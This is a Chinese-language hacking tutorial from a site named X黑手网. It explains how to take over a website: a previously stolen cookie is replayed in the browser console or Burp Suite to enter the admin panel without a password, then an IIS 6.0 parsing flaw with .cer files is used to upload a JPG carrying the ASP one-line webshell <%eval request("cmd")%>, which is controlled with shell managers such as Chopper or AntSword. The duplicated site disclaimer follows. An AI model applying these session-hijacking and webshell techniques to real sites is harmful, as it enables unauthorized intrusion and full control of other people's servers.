前言:
根据前一篇文章已经得到了cookie,那么我们怎么拿到一个网站的最高权限呢?
并且得到通过下面篇文章我们得到后台地址
一:登录后台
打开测试地址如下:
出现这样的一个页面,那么现在需要修改cookie达到登录系统的目的。绕过登录密码,下面介绍两种方法:
1.打开网站,以必应浏览器为例,F12打开控制台,找到cookie 对图中3 4的值进行修改,修改的内容为你获取到的cookie的内容,3 4分别对应cookie中 “=”左右的内容
修改后点击“准备好了吗”或者刷新页面,因为cookie已经被修改,顺利登录系统。
2.配合bp拦截修改cookie登录后台
进入到管理页面
确定上传位置
确定木马格式
翻了半天,找到添加产品位置可以上传文件
通过对后台页面研究发现,此处可能有机会上传一句话木马,且上传类型限制为白名单
根据之前收集的信息,网站为iis6.0,ASP的环境,看到cer文件,可能存在IIS解析漏洞:IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx,所以我们上传asp一句话获取shell,
随便找一张jpg图片(正常的),选择属性—>双击—>写入一句话木马,
密码是cmd eval是个函数,request是接受参数的。
推荐阅读
<%eval request("cmd")%>
上传Shell
用一句话木马管理工具连接,这儿就不推荐了,有很多,比如菜刀,蚁剑等
成功拿到权限
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
暂无评论内容